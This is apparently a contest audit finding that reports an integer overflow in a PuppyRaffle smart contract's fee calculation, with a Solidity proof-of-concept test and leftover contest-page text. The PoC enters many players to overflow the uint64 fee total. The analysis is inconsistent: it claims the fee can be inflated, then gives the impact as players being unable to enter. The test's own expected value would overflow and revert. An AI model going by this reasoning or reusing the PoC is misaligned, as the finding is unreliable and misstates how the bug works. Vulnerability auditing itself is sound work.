Integer Over Flow
Summary
By entering large number of players fee can be set high and hence increasing the total fee.
Vulnerability Details
Fee is calculated on the basis of
uint256 totalAmountCollected = players.length * entranceFee;
uint256 fee = (totalAmountCollected * 20) / 100;
fee can be manipulated with the number of players,
POC
''' function testTotalFeesOverflow() public {
// Define a large entrance fee and the number of players to trigger the overflow
uint256 entranceFees = 1 ether; // Set your desired entrance fee
uint256 numPlayers = type(uint64).max / entranceFees + 1;
// Prepare an array of addresses for entering the raffle
address[] memory newPlayers = new address[](numPlayers);
for (uint256 i = 0; i < numPlayers; i++) {
newPlayers[i] = address(this); // Using the test contract's address
}
// Attempt to enter the raffle with a large number of players
puppyRaffle.enterRaffle(newPlayers);
// Calculate the expected total fees (without overflow)
uint64 expectedTotalFees = uint64(entranceFees) * uint64(numPlayers);
// Get the actual total fees from the contract
uint64 actualTotalFees = puppyRaffle.totalFees();
// Assert that the actual total fees match the expected value
assertEq(uint256(actualTotalFees), uint256(expectedTotalFees), "Total fees should match expected value");
}
'''
Impact
Impossible to enter raffle for players.
Tools Used
Manual Review
Recommendations
Use Safe math library.
Lead Judging Commences
overflow-uint64
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.